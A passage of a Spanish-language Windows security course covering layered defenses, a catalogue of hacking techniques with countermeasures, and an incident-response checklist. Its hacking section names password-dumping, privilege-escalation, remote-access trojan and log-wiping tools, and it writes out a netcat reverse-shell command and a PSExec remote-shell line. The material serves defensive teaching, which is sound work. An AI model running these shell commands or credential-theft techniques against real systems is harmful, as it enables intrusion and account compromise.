Es improbable que uno sea el responsable de la implementación de seguridad de los socios comerciales; por lo tanto, no se puede confiar completamente en todo el acceso que se origine en ese entorno. Además, no se tiene control del hardware de los usuarios remotos, lo que constituye otro motivo para no confiar en el mismo. Las sucursales podrían no contener información confidencial y, por lo tanto, es posible que tengan una implementación menos segura. Sin embargo, podrían tener vínculos directos a la oficina principal que un intruso podría usar.

Es importante considerar la seguridad de la red en conjunto, no sólo en áreas individuales.

9.10. Protección del nivel de perímetro

Cap1-17.jpg

La protección de los perímetros se puede llevar a cabo principalmente con servidores de seguridad. La configuración de un servidor de seguridad puede ser difícil desde el punto de vista técnico. Por lo tanto, los procedimientos deben detallar claramente los requisitos.

Los sistemas operativos recientes de Microsoft® Windows® facilitan el bloqueo de los puertos de comunicación innecesarios para reducir el perfil de ataque de un equipo.

La traducción de direcciones de red (NAT, Network Address Translation) permite a una organización disimular las configuraciones de direcciones IP y de puertos internos para impedir que usuarios malintencionados ataquen los sistemas internos con información de red robada. Los mecanismos de seguridad del perímetro pueden ocultar también los servicios internos, incluso aquellos que están disponibles externamente, de modo que un intruso nunca se comunique de forma directa con ningún sistema que no sea el servidor de seguridad desde Internet.

Cuando los datos salen del entorno que está bajo la responsabilidad de uno, es importante que se encuentren en un estado que garantice su seguridad y que lleguen intactos a destino. Esto se puede conseguir mediante protocolos de túnel y cifrado, con el fin de crear una red privada virtual (VPN, Virtual Private Network).

El protocolo de túnel que emplean los sistemas de Microsoft es el Protocolo de túnel punto a punto (PPTP, Point-to-Point Tunneling Protocol), que utiliza Cifrado punto a punto de Microsoft (MPPE, Microsoft Point-to-Point Encryption), o Protocolo de túnel de nivel 2 (L2TP, Layer 2 Tunneling Protocol), que utiliza el cifrado de IPSec.

Cuando los equipos remotos establecen comunicación a través de una VPN, las organizaciones pueden seguir pasos adicionales para examinar esos equipos y garantizar que cumplan una directiva de seguridad predeterminada. Los sistemas que establecen la conexión se aíslan en un área independiente de la red hasta que se completan las comprobaciones de seguridad.

Los sistemas del perímetro también deben tener usos claramente definidos. Bloquear o deshabilitar cualquier otra funcionalidad.

Firewall de Windows, que se incluye con Windows XP y Windows Server 2003, puede extender la protección del perímetro a los usuarios remotos.

La protección del perímetro de una red es el aspecto más importante para parar un ataque del exterior. Si un perímetro sigue siendo seguro, la red interna se debe proteger contra ataques externos. Se enumeran abajo algunas maneras de implementar la defensa del perímetro:

Packet Filtering, Inspección de paquetes, Intrusion Detection

9.11. Descripción del nivel de red interna

Cap1-18.jpg

Los ataques no provienen sólo de orígenes externos. Tanto si los ataques internos son genuinos como si son meros accidentes, muchos sistemas y servicios se dañan desde dentro las organizaciones.

Es importante implementar medidas internas de seguridad orientadas a las amenazas mal intencionadas y accidentales.

9.12. Compromiso de la seguridad del nivel de red interna

Cap1-19.jpg

El acceso a los sistemas y recursos de red internos permite a los intrusos obtener acceso fácilmente a los datos de la organización.

Mediante el acceso a la infraestructura de red también pueden supervisar la red e investigar el tráfico que se está transportando. Las redes totalmente enrutadas, aunque hacen que la comunicación sea más fácil, permiten a los intrusos tener acceso a los recursos de la misma red independientemente de si se encuentran o no en ella.

Los sistemas operativos de red tienen instalados muchos servicios. Cada servicio de red constituye un posible medio de ataque.

9.13. Protección en el nivel de red interna

Uno puede tener una serie de redes en su organización y debe evaluar cada una individualmente para asegurarse de que está asegurada apropiadamente. Se enumeran abajo algunas maneras de implementar defensas de red:

VLAN Access Control Lists, Internal Firewall, Auditing, Intrusion Detection

Para proteger el entorno de la red interna, se debe requerir que cada usuario se autentique de forma segura en un controlador de dominio y en los recursos a los que tenga acceso. Utilizar la autenticación mutua, de

modo que el cliente también conozca la identidad del servidor, con el fin de impedir la copia accidental de datos a los sistemas de los intrusos.

Segmentar físicamente los conmutadores, es decir, crear particiones de la red para impedir que toda ella esté disponible desde un único punto. Se puede crear particiones si se utilizan enrutadores y conmutadores de red independientes o si crean varias redes virtuales de área local (VLAN, Virtual Local Area Network) en el mismo conmutador físico.

Considerar cómo se van a administrar los dispositivos de red, como los conmutadores. Por ejemplo, el grupo de trabajo de red podría utilizar Telnet para tener acceso a un conmutador o enrutador y realizar cambios de configuración. Telnet pasa todas las credenciales de seguridad en texto sin cifrar. Esto significa que los nombres y las contraseñas de los usuarios son accesibles para cualquiera que pueda rastrear el segmento de red. Esto puede constituir una debilidad importante de la seguridad.

Considerar permitir únicamente el uso de un método seguro y cifrado, como SSH de shell o acceso de terminal serie directo.

También se deben proteger adecuadamente las copias de seguridad de las configuraciones de dispositivos de red. Las copias de seguridad pueden revelar información sobre la red que resulte útil a un intruso. Si se detecta una punto débil, se pueden utilizar copias de seguridad de la configuración de los dispositivos para realizar una restauración rápida de un dispositivo y revertir a una configuración más segura.

Restringir el tráfico aunque esté segmentado. Puede utilizar 802.1X para proporcionar un acceso cifrado y autenticado tanto en las LAN inalámbricas como en las estándar. Esta solución permite utilizar cuentas de Active Directory y contraseñas o certificados digitales para la autenticación. Si se utilizan certificados, se tendrá que integrar una infraestructura de clave pública (PKI, Public Key Infrastructure), en Servicios de Windows Certificate Server; para las contraseñas o certificados, también necesitará un servidor RADIUS integrado en el Servicio de autenticación Internet (IAS, Internet Authentication Service) de Windows. En Windows Server 2003 se incluyen IAS y Servicios de Certificate Server.

Implementar tecnologías de cifrado y firma, por ejemplo la firma de IPSec o bloque de mensajes de servidor (SMB, Server Message Block), con el fin de impedir a los intrusos rastrear los paquetes de la red y reutilizarlos.

9.14. Descripción del nivel de host

Cap1-20.jpg

Es probable que los sistemas de una red cumplan funciones específicas. Esto afectará a la seguridad que se les aplique.

9.15. Compromiso de la seguridad del nivel de host

Cap1-21.jpg

Se puede atacar a los hosts de red con funciones que se sabe que están disponibles de forma predeterminada, aunque el servidor no las necesita para realizar su función.

Los intrusos también podrían distribuir virus para emprender un ataque automatizado.

El software instalado en sistemas de equipos podría tener puntos débiles que los intrusos pueden aprovechar. Es importante permanecer informado de todos los problemas de seguridad del software de su entorno.

9.16. Protección en el nivel de host

Se debe evaluar cada host en su ambiente y crear las políticas que limitan cada servidor solamente a esas tareas que se tienen que realizar. Esto crea otra barrera de seguridad que un atacante necesitaría evitar antes de hacer cualquier daño.

Server Hardening, Host Intrusion Detection, IPSec Filtering, Auditing

Tanto en los sistemas cliente como en los servidores, las técnicas de refuerzo dependerán de la función del equipo. En cada caso, se pueden utilizar plantillas de seguridad y plantillas administrativas con directivas de grupo para proteger estos sistemas.

En los sistemas cliente, también se pueden utilizar directivas de grupo para restringir los privilegios de los usuarios y controlar la instalación de software. El uso de directivas de grupo para limitar las aplicaciones que un usuario puede ejecutar impide que éste ejecute de forma inadvertida código de tipo Caballo de Troya.

En los sistemas de servidor, las técnicas de refuerzo también incluyen la aplicación de permisos NTFS, la configuración de directivas de auditoría, el filtrado de puertos y la realización de tareas adicionales según la función del servidor.

Mantener el servidor y el cliente actualizados con respecto a las actualizaciones también mejora la seguridad. Microsoft proporciona varias formas de aplicar revisiones a los sistemas, por ejemplo, mediante Windows Update, Software Update Service y Microsoft Systems Management Server (SMS).

La utilización de un paquete antivirus actual y de un servidor de seguridad personal, como Firewall de Windows, disponible con Windows XP y con los sistemas operativos posteriores, puede reducir mucho la parte expuesta a un ataque de un equipo cliente.

9.17. Descripción del nivel de aplicación

Cap1-22.jpg

Las aplicaciones de red permiten que los clientes tengan acceso a los datos y los traten. También constituyen un punto de acceso al servidor donde se ejecutan las mismas.

Recordar que la aplicación proporciona un servicio a la red. Este servicio no debe anularse con la implementación de seguridad.

Examinar las aplicaciones desarrolladas internamente, además de las comerciales, en busca de problemas de seguridad.

9.18. Compromiso de la seguridad del nivel de aplicación

Cap1-23.jpg

Los intrusos cuyo interés son las aplicaciones pueden bloquear alguna para conseguir que su funcionalidad deje de estar disponible.

Las aplicaciones pueden tener defectos que los atacantes pueden manipular para ejecutar código malintencionado en el sistema.

Un intruso podría utilizar en exceso un servicio de modo que se imposibilite su uso legítimo; éste es un tipo de ataque de denegación de servicio.

Una aplicación también podría utilizarse para llevar a cabo tareas para las que no esté destinada, como enrutar correo electrónico.

9.19. Protección en el nivel de aplicación

Como otra capa de defensa, Application Hardening es una parte esencial de cualquier modelo de seguridad. Cada aplicativo en una organización debe ser probado a fondo para la conformidad de seguridad en un ambiente de prueba antes de que se permita su puesta en producción.

Validation Checks, Verify HTML / Cookies Source, Secure IIS

Las instalaciones de las aplicaciones sólo deberían incluir los servicios y funcionalidad requeridos.

Las aplicaciones desarrolladas internamente se deben evaluar para descubrir vulnerabilidades en la seguridad de una forma continuada y

deben desarrollarse e implementarse revisiones para cualquier vulnerabilidad que se identifique.

Las aplicaciones que se ejecutan en la red se deben instalar de forma segura y se les deben aplicar todas las revisiones y Service Packs correspondientes.

Debe ejecutarse software antivirus para ayudar a impedir la ejecución de código malintencionado.

Si una aplicación se ve comprometida, es posible que el intruso pueda tener acceso al sistema con los mismos privilegios con los que se ejecuta la aplicación. Por lo tanto, ejecutar los servicios y aplicaciones con el menor privilegio necesario.

Al desarrollar nuevas aplicaciones personalizadas, implementar las recomendaciones más recientes de ingeniería de seguridad.

9.20. Descripción del nivel de datos

Cap1-24.jpg

El nivel final lo constituyen los datos. Los sistemas de equipos almacenan, procesan y ofrecen datos. Cuando los datos se procesan en un formato con significado, se convierten en información útil.

Los datos sin formato y la información que se almacena en un sistema son objetivos de un posible ataque. El sistema mantiene los datos en medios de almacenamiento masivo, generalmente en un disco duro.

Todas las versiones recientes de Microsoft Windows admiten varios sistemas de archivos para almacenar y tener acceso a los archivos en un disco. Uno de estos sistemas, NTFS, se puede utilizar en Microsoft Windows NT®, Windows 2000, Windows XP y Microsoft Windows Server™ 2003. Proporciona tanto permisos de archivo como de carpeta para ayudar a proteger los datos.

NTFS admite características adicionales, como la auditoría y el Sistema de archivos de cifrado (EFS, Encrypting File System), que se utiliza para implementar la seguridad en los datos.

9.21. Compromiso de la seguridad del nivel de datos

Cap1-25.jpg

Los intrusos que obtienen acceso a un sistema de archivos pueden hacer un daño enorme u obtener gran cantidad de información. Pueden ver archivos de datos y documentos, algunos de los cuales tal vez contengan

información confidencial. También pueden cambiar o quitar la información, lo que puede ocasionar varios problemas a una organización.

El servicio de directorio Active Directory utiliza los archivos del disco para almacenar la información del directorio. Estos archivos se almacenan en una ubicación predeterminada cuando el sistema se promueve a controlador de dominio. Como parte del proceso de promoción, sería aconsejable almacenar los archivos en algún lugar diferente de la ubicación predeterminada porque de este modo quedarían ocultos de los intrusos. Dado que los nombres de los archivos son conocidos (tienen el nombre de archivo NTDS.dit), si únicamente se reubican es probable que sólo se consiga entorpecer el trabajo del intruso. Si los archivos de directorio se ven comprometidos, todo el entorno del dominio queda expuesto al riesgo.

Los archivos de aplicación también se almacenan en disco y están expuestos a un ataque, con lo que se ofrece a los intrusos la oportunidad de interrumpir la aplicación o manipularla con fines malintencionados.

9.22. Protección en el nivel de datos

EFS permite el cifrado de los archivos cuando residen en el sistema de archivos. Se basa en el formato NTFS del disco, que está disponible desde Windows 2000. Es importante entender que EFS no cifra los archivos mientras se están transmitiendo a través de una red. El proceso de cifrado utiliza una clave para cifrar el archivo y la tecnología de claves pública y privada para proteger dicha clave.

NTFS también proporciona seguridad en los archivos y en las carpetas. De este modo, se permite la creación de listas de control de acceso para definir quién ha obtenido acceso a un archivo y qué acceso tiene.

El aumento de la protección del nivel de datos debe incluir una combinación de listas de control de acceso y cifrado. Al cifrar un archivo, únicamente se impide la lectura no autorizada; no se evita ninguna acción que no requiera la lectura del archivo, como la eliminación. Para impedir la eliminación, utilice listas de control de acceso.

Puesto que los datos son esenciales en muchos negocios, es importante que su recuperación sea un proceso conocido y probado. Si se realizan copias de seguridad con regularidad, cualquier alteración o eliminación de datos, ya sea accidental o malintencionada, puede recuperarse a partir de las copias de seguridad cuando corresponda. Un proceso confiable de copia de seguridad y restauración es vital en cualquier entorno. Además, se deben proteger las cintas de copia de seguridad y restauración. Las copias de las cintas de copia de seguridad y restauración se debe mantener en otro lugar, en una ubicación segura. El acceso no autorizado

a las cintas de copia de seguridad es igual de dañino que infringir la seguridad física de la infraestructura.

Las listas de control de acceso sólo funcionan en documentos dentro del sistema de archivos para el que se hayan habilitado. Una vez que se han copiado los documentos a otra ubicación (por ejemplo, a la unidad de disco duro local de un usuario), no se sigue controlando el acceso. Windows Rights Management Services (RMS), que se incluye con Windows Server 2003, mueve la función de control de acceso al propio objeto de forma que dicho control se aplica independientemente de dónde se almacene el documento físico. RMS también ofrece a los creadores de contenido un mayor control sobre las acciones particulares que un usuario tiene permitido llevar a cabo; por ejemplo, el destinatario puede tener concedido acceso para leer un documento, pero no para imprimir o copiar y pegar; en el correo electrónico enviado con Microsoft Office Outlook® 2003, el remitente del mensaje puede impedir que los destinatarios reenvíen el mensaje.

10.Respuesta a incidentes de seguridad

En este tema, se explicará cómo responder a incidentes de seguridad. Específicamente, se tratará:

El uso de una lista de comprobación de respuesta a incidentes. La contención de los efectos de un ataque.

10.1. Determinación de Riesgos de Seguridad

Cap1-32.jpg

Para determinar riesgos de seguridad, puede ayudar el preguntarse "cuál sería el daño al negocio si…" Intente pensar en qué se pueden comprometer su red y cómo afectará el negocio. Éstos pueden incluir aplicativos de línea de negocio, datos del cliente, etcétera.

Una vez que se haya formulado una lista, identificar qué puede dañar su negocio más, si está comprometido. Los daños posibles pueden incluir:

Tiempo muerto Pérdida de negocio Reputación dañada Confianza del cliente Uso fraudulento de la información Responsabilidad Legal

Después que usted ha determinado los posibles riesgos, pregúntese "¿qué puedo yo hacer para atenuar el riesgo?"

Para más información, ir a Microsoft Press book Windows Security Resource Kit así como en Microsoft Solution for Securing Windows 2000 http://go.microsoft.com/fwlink/?LinkId=14837

10.2. Tecnicas de Hacking

Cap1-33.jpg

Footprinting Scanning Enumeration Gaining Access Privilege Escalation Buffer Overflows Shovel a Shell Interactive Control Camouflaging Intelligence Gathering Island Hopping

Denial of Service Social Engineering

Luego, mirar algunas técnicas comunes de hacking. Cuanto más se aprende sobre las técnicas usadas por el hacker, mejor se puede proteger una red contra estas técnicas.

Nota: Esto no es un manual de cómo atacar sistemas pero es en algo una descripción de las técnicas usadas por los atacantes.

10.2.1. Tecnicas de Hacking: Footprinting

El uso de un atacante de herramientas y de la información para crear un perfil completo de la postura de la seguridad de una organización se conoce como footprinting. Por ejemplo, antes de que un hacker ataque una red, el/ella quiere conocer la información que incluye:

Presencia en Internet/ extranet de la compañía La política de la compañía con respecto al acceso remoto La versión utilizada de software en los servers (IIS, Exchange etc) Los rangos IP de los cuales es propietaria la organizacion Desafíos técnicos hechos por la compañía Las fusiones o las adquisiciones que terminaron recientemente, estan en

marcha o pendientes

Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la información sobre una compañía. Puede ser tan simple como usar un Search Engine para encontrar la información tal como la que fija el detalle técnico de un administrador, usar al USENET o detalles incluidos en publicidad de una compañía.

Más información un atacante tiene antes de comenzar su ataque y por lo tanto más fácil será para que apunten una debilidad específica en la infraestructura.

10.2.2. Técnicas de Hacking: Scanning

Como resultado del footprinting, un hacker puede identificar la lista de red y las direcciones IP utilizadas en la compañía. El siguiente paso lógico para un hacker es el scanning. El uso de un atacante de herramientas y de la información es para determinar qué sistemas estas vivos y accesibles desde Internet así como qué puertos están escuchando en cualquier sistema dado. Con ese conocimiento, el atacante puede apuntar los sistemas específicos que funcionan con software o servicios específicos usando exploit conocidos.

10.2.3. Técnicas de Hacking: Enumeration

Enumeration implica el uso de un atacante de herramientas para obtener la información detallada sobre un sistema remoto - por ejemplo servicios ejecutándose, todos los shares, cuentas de usuario, grupos, miembros de un dominio, politicas de cuentas (lockout, password age, etc.

Un hacker típicamente utiliza enumeration no intrusiva probando si la información que obtuvo es suficiente para un ataque.

Nota: RestrictAnonymous = 1 es derrotado fácilmente por las ultimas

herramientas de enumeración (NBTEnum2.1.exe, DumpSec) RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar

sistemas críticos para asegurarse de que los cambios de la seguridad no afectarán sistemas de producción de una manera negativa.

Renonbrar las cuentas administrativas es un buen punto para no utilizar RestrictAnonymous configurado con valor =2 o bloquear el acceso a puertos. NetBIOS una variedad de herramientas tienen la habilidad de poder determinar cuentas administrativas basadas en SID / RID enumerados vía queries NetBIOS.

Propósito:Usar la información detallada acerca del sistema remoto, servicios, shares, cuentas de usuarios, grupos, información de controladores de dominio, políticas de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de atacar la seguridad de cuentas y servicios en el objetivo.

10.2.4. Técnicas de Hacking: Port Redirection

Cuando se tiene configurado un firewall para bloquear determinados puertos de acceso entrante, un hacker puede usar port redirection como camino de acceso a la red. Port redirection es utilizado para escuchar en algunos puertos. Los paquetes son redireccionados a destinos específicos.

Nota: El Port Redirector tiene que instalarse en un servidor detrás de un firewall. Usar algún otro exploit (IIS buffer overflow, etc.). El resto de las pautas de

seguridad atenuarán a menudo el riesgo de este tipo de ataque. Utilizar una política IPSec para permitir el acceso a los puertos abiertos

de las máquinas específicas. El filtrado de ingreso parece ser usualmente la parte importante, pero el

filtrado de egreso es importante también! En otras palabras si un IIS Server solamente necesita hablar con un solo

COM+ server en una DMZ en un puñado de puertos, configurar una

politica IPSec para hacer cumplir esta política, no permitir al server IIS para comunicarse con cualquier servidor en la red en cualquier puerto, ¡filtro es tráfico de salida también!

También, estar enterado del tipo de excedente de tráfico en cualquier puerto dado. Si se ve el tráfico ICMP que debe tener una carga útil cero del octeto o contener una carga útil 500k o de tráfico de TFTP en el puerto 80, eso debe alertar, más aún si no es parte de sus operaciones estándares.

Propósito:Después que el atacante tiene identificado y accede al trafico del firewall que puede permitir tráfico de entrada de un puerto origen 53, procurar instalar un software Port Redirector en el equipo dentro del firewall. El Port Redirector tomará el tráfico entrante destinado para un puerto (53) y lo enviará a otro equipo detrás del firewall en otro puerto (3389).

Ejemplo:FPipe.exe – herramienta port redirection de linea de commandos

Contramedidas: El Port Redirector tiene que instalarse de alguna manera en un servidor detrás del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guías de seguridad atenuarán el riesgo de este tipo de ataque.

Usar una política de IPSec para permitir solamente el acceso a los puertos abiertos de las máquinas específicas.

10.2.5. Técnicas de Hacking: Gaining Access

Hay varias herramientas disponibles que pueden permitir a un hacker tomar control de un sistema. Por ejemplo, Samdump y Brutus son crackers de passwords. Samdump se utiliza extraer el hashes del password de los archivos SAM. Brutus es un cracker de password remoto. Si un hacker consigue el acceso a una copia de una base de datos SAM, el hacker podría utilizar l0phtcrack y extraer los usuarios y passwords exactos.

ATACAR LA SAM MIENTRAS QUE ESTÁ EN LÍNEA

Propósito:Los atacantes consiguen los password hashes de la SAM en un sistema en línea para comprometer cuentas adicionales.

Utilizan las herramientas por ejemplo PWdump2 que utiliza una técnica conocida como ‘DLL injection’ para inyectar código malicioso en LSASS.EXE (a trusted

process). LSASS puede solicitar password hashes desencriptados para saltear la protección de SYSKEY.

Ejemplos:SamdumpPwdump1,2,3,3eLC3 / LC4

Contramedidas:SYSKEY está habilitado por defecto en Windows 2000 en modo 0 y encripta con hashes de 128bit. La key para desencriptar se guarda en registry.Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden sortear todas las protecciones de ’ SYSKEY en todos los modos para extraer los passwords.

Evitar que un atacante descargue hashes es la mejor contramedida pero para el aseguramiento agregado hacer el siguiente:

Desabilitar la posibilidad de guardar los LM hashed password en registry (habilitado por defecto).

Cambiar todos los passwords luego de hacer esto! Requerir password complejas (recomendado 15 caracteres alfanuméricos

–ej. !@#$%^&*-)

ATACAR UNA COPIA FUERA DE LÍNEA DE LA SAM

Propósito:Existen numerosos exploits de IIS para obtener una copia de la SAM.El acceso físico incorrecto puede conceder el acceso a la SAMEj. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de bloquear la consola.¡Esto permite obtener una copia de la SAM con el fin el conseguir hashes!

EjemploCHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot floppy está disponible y puede obtener una copia de la SAM, SYSTEM y SECURITY en una RAM drive para directamente ver y editar con CHNTPW.Si la protección SYSKEY está habilitada (esto es por defecto en la SAM de Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego puede iniciar sesión y obtener el resto de las password (usando PWDump3 etc.).

Contramedidas No permitir la copia de la SAM. Deshabilitar el almacenamiento de LM hashed password en la SAM.

Habilitar SYSKEY en modo 2 o 3 para requerir una password ó un floppy que contenga la key privada antes de poder iniciar sesion.

Si un atacante puede inhabilitar SYSKEY y escribir una nueva password para el administrador en la SAM, todos los password hashes del resto de las cuentas continuan encriptados y protegidos del ataque.

Notas: Para deshabilitar el almacenamiento de LM hash en la SAM refiérase a la siguiente KB: Q299656 New Registry Key to Remove LM Hashes from AD & SAM http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q299656

SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM para prevenir cracking fuera de línea (Q143475 Windows NT System Key Permits Strong Encryption of the SAM)http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475) No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.

10.2.6. Técnicas de Hacking: Privilege Escalation

Un hacker puede causar la mayoría del daño consiguiendo privilegios administrativos en una red. Hay varias utilidades que un hacker puede utilizar para ganar privilegio administrativo. Por ejemplo, la utilidad Getadmin.exe es usada para otorgar a usuarios comunes privilegios administrativos agregando a estos usuarios al grupo de administradores. Esta utilidad funciona con todas las cuentas excepto con la cuenta de Guest.

Es importante observar que cualquier cuenta se haya concedido el “Debug Programs right”. Siempre se podrá ejecutar satisfactoriamente Getadmin.exe, incluso después de la aplicación del hotfix. Esto es porque el “Debug Programs right” habilita al usuario a adjuntar cualquier proceso. El “Debug Programs right” es inicialmente otorgado a Administradores y debe ser utilizado únicamente con usuarios altamente confiables.

También, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del grupo local de los administradores, continua funcionando (incluso luego de aplicar el hotfix).

Nota: Para mas información dirigirse a: http://support.microsoft.com/default.aspx?scid=kb;en-us;146965

10.2.7. Tenicas de Hacking: Buffer Overflows

Algunas herramientas de ataque ejecutan código de buffer overruns. Sobreescribiendo segmentos específicos de la memoria, el atacante puede volver a dirigir una llamada de la memoria dentro de un programa para llamar su propio código en vez del código previsto. Tal llamada funcionaría en el contexto de seguridad del proceso que lo llama más que el nivel de privilegio del usuario.

Propósito:Las herramientas BO overflow un-checked buffers generan código en aplicaciones de Server para causar ‘shellcode’ y ejecutarse (usualmente en contexto ‘SYSTEM’ o ‘IWAM’ si explota IIS / SQL etc.)

Ejemplos:JILL-WIN32.EXEExplota IIS .printer overflow IIS5hack.exeISPC.EXEExploits IIS .idq overflow Unicodeloader.plHTTPODBC.DLLSQL buffer overflowsContramedidas:Mantener al dia los hotfixesDeshabilitar servicios innecesarios Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)Emplear un sistema IDS actualizado para denegar pedidos sospechosos / conocidos como attack signaturas.

10.2.8. Técnicas de Hacking: Shovel a Shell

Propósito:Herramientas de shell Remoto habilitan a los atacantes a acceder al ‘remote command shell’ en el servidor destino. Los atacantes usan remote shell para elevar sus privilegios.

Ejemplos:Netcat Nc.exe prove una conexion raw a servidores remotos via TCP.Puede funcionar como un servidor o un clienteCryptcat, es igual que Netcat pero encripta los datos via un canal TCPNc.exe 10.1.1.10 5000 –e cmd.exe‘shovel a shell’ de un servidor comprometido de nuevo a una máquina remota cliente que funciona escuchando en la dirección 10.1.1.10 en el puerto 5000PSExec.exe \\192.168.1.1 cmd.exeRequiere acceso administrativo

Requiere acceso a NetBIOS (TCP 139)Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota CMD.EXE y conecta con la “command shell” del cliente.

Contramedidas:Netcat (nc.exe) puede establecer una conexión TCP al servidor destino en cualquier Puerto que esté escuchando y no sea utilizado. Es por eso que un filtrado apropiado en el firewall previene este tipo de ataque.Politicas IPSec para habilitar trafico entrante únicamente a los Puertos donde corren servicios es un método eficaz (sólo habilitar trafico en el puerto 80 en servidores IIS, denegar todo el trafico en otros puertos)

10.2.9. Técnicas de Hacking: Interactive Control

Propósito:Llamados como ‘RATs’ (Remote Administration Tools).Éstas son herramientas reales y cautelosas de Administracion Remota contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe). ¡Eso permite que un usuario remoto realice cualquier acción remotamente vía un puerto a su elecion sin un usuario local del sistema que lo habilite!

Características populares: Keystroke logging, dedicados a grabar password de servicios populares (AIM, ICQ, File shares etc.), tienen la habilidad de crear file shares, transferir files, remote desktop, remote execution, reboot system, etc.

Ejemplos:Sub7, BO2k, NetBus, NT RootkitSub7 es el más popular / NT Rootkit es el más avanzado

Contramedidas:Puesto que la mayoría de los Trojanos escucha en un puerto para habilitar el acceso remoto del atacante, un filtrado apropiado de puertos sería lo indicado para prevenir este ataque.

La mayoría de los productos anti-virus detectarán a éstos y sus variantes pero hay literalmente millares de variantes nuevas que aparecen a cada hora Usualmente llegan como archivos adjuntos vía e-mail; por eso no habilitar e-mail / internet browsing en servers y controlar los adjuntos a través de Outlook/Exchange Email Security functionality, Software Restriction Policies, Filtros en los SMTP gateway o mail server etc.

La mayoría de los Trojanos intentan modificar Run / RunOnce y otras configuraciones de typo auto-run. Puede utilizarse software de monitoreo como NetIQ que puede avisar por medio de alertas sobre eventos de modificación de

estas keys de registry. Aplicando permisos de ACLs a estas keys, se puede reducir (pero no eliminar) estos ataques.

10.2.10. Tecnicas de Hacking: Camouflaging

Después que un hacker logra la entrada en una red, tratará de no dejar rastros de su presencia y su paso a los Administradores. Hay varias herramientas que un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas para borrar registros de los logs de eventos.

NT Rootkits es utilizado a veces por un atacante. En tal ataque, son reemplazados ciertos archivos con versiones modificadas. Cuando un administrador utiliza el ejecutable, el atacante obtiene información adicional para continuar su ataque. Semejantemente, los elementos específicos de salida se pueden enmascarar por rootkit para camuflar las herramientas de ataque que se ejecutan en el sistema. Un acercamiento común para detectar archivos modificados es comparar la versión en el hash de un archivo limpio. Es importante observar que la comparación se debe hacer en una máquina limpia usando medios confiables, pues es también es posible que cualquier utilidad del ataque haya comprometido el sistema en cuestión.

Propósito:Alertar a el atacante que alguien está investigando.Se puede utilizar para ejecutar programas destructivos en nombre del Administrador o instalar backdoor trojans.

Ejemplos:Sobreescribir los comandos del sistema con comandos del trojano.Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o detengan procesos del atacante.Sobreescribir CMD.EXE con una versión del atacante.

Contramedidas:Generar las keys MD5 para todos los archivos del sistema importantes y comprobar hashes con frecuencia.Configurar una auditoria adecuada de archivos.Usar permisos apropiados sobre los archivos.

10.2.11. Técnicas de Hacking: Intelligence Gathering

SNIFFING

Propósito:

Después de utilizar un sniffer el atacante está en condiciones de obtener nombres de cuentas y passwords que pasen por la red en texto plano.

Puede ser utilizado para descubrir otras redes / equipos que pueden estar comprometidos en un futuro.

Puede ser utilizado para descubrir otros sniffers. Netmon utilizabroadcasts del protocolo BONE. Los equipos Windows por defecto responden pedidos ARP (Unix puede

restringir respuestas ARP)Ejemplos: WinDump – sniffer de línea de comandos para Windows es similar a TCPDump para UnixEthereal – GUI OSS sniffer similar al network monitorScoopLM – dedicado a NTLM hash snifferLC3 –usado para captura de hash

Contramedidas:Usar la ultima versión de NTLM V2 o Kerberos (recomendado) en todos los equipos de la red.Usar IPSec para encriptar el trafico de red.Usar redes switcheadas para evitar la captura de paquetes.

10.2.12. Técnicas de Hacking: Island Hopping

Island Hopping es una técnica de Hacking en la cual el hacker incorpora una red de ordenadores débiles y después se traslada a partes más seguras de la red. Esencialmente, están utilizando las mismas técnicas discutidas previamente para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para un atacante comprometer un web server sin interés y sin la seguridad apropiada. Es algo mucho más atractivo la red corporativa entera donde existen datos más interesantes para la compañía.

HASH CRAMMINGPermite al usuario conseguir el acceso al sistema sin romper la contraseña insertando un Hash capturado directamente en la memoria. Esta técnica puede apresurar un ataque porque el atacante no necesita primero comprometer el password de una cuenta.

10.2.13. Técnicas de Hacking: Social Engineering

Es de naturaleza humana. Nosotros, como generalización, conseguir la satisfacción de participar en el éxito de otros. Los atacantes ruegan a menudo esta opción. No realizando prácticamente acción alguna, obtienen información que de otra manera no estaría disponible. Un atacante social listo puede trampear a menudo a individuos en la organización para divulgar la información

que pertenece a los nombres de servers, números de módem, direcciones IP, configuraciones de red, políticas de password, nombres de cuentas u otra información privilegiada que sea beneficiosa en un ataque.

10.2.14. Técnicas de Hacking: Denial of Service

Un atacante no tiene que acceder necesariamente a un sistema para causar problemas significativos. Los ataques Denial of Service (DoS) realizan tareas en los servicios con el fin de evitar su normal funcionamiento. Los ejemplos incluirían todas las conexiones de red en un server o asegurarse que un mail Server reciba más mails de los que puede manejar. Los ataques DoS pueden ser un ataque directo o causado por virus, gusanos o Trojan horses.

Los objetivos de los ataques Denial of service pueden ser:

CPU Espacio en disco Ancho de banda de red Cualquier recurso o servicio

10.3. Lista de comprobación de respuestas a incidentes

Cap1-26.jpg

Disponer de planes y procedimientos de respuesta a incidentes claros, completos y bien comprobados es la clave para permitir una reacción rápida y controlada ante las amenazas.

Para limitar el efecto de un ataque, es importante que la respuesta sea rápida y completa. Para que esto suceda, se debe realizar una supervisión y auditoría de los sistemas.

Una vez identificado un ataque, la respuesta al mismo dependerá del tipo de ataque.

Comunicar que el ataque se ha producido a todo el personal pertinente.

Contener los efectos del ataque en la medida de lo posible. Tomar medidas preventivas para asegurar que el ataque no pueda

repetirse. Crear documentación para especificar la naturaleza del ataque, cómo

se identificó y cómo se combatió.

